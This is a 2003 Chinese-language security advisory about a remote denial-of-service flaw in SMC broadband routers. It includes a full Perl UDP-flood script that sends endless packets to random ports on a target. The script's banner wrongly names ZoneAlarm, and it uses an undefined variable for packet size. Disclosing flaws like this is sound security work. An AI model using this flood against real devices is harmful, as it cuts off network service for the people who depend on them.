SMC Router随机UDP包远程拒绝服务攻击漏洞
发布日期:2003-09-26
更新日期:2003-10-08
受影响系统:SMC SMC7004VWBR 1.23
SMC SMC7004VWBR 1.22
SMC SMC7004VWBR 1.21a
SMC SMC2404WBR
描述:
BUGTRAQ ID:
8711
SMC2404WBR是一款无线CABLE/DSL宽带路由器。
SMC路由器不能正确处理随机发送的UDP包端口扫描,远程攻击者可以利用这个漏洞对路由器进行拒绝服务攻击。
发送随机UDP包到路由器上的0-65000端口,可引起路由器挂起,停止对正常服务的响应。
<*来源:res076cf (
res076cf@alltel.net)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106458229620587&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
res076cf (
res076cf@alltel.net)提供了如下测试方法:
#!/usr/bin/perl
use Socket;
system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}
建议:
厂商补丁:
SMC
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.smc.com/浏览次数:2817
严重程度:0(网友投票)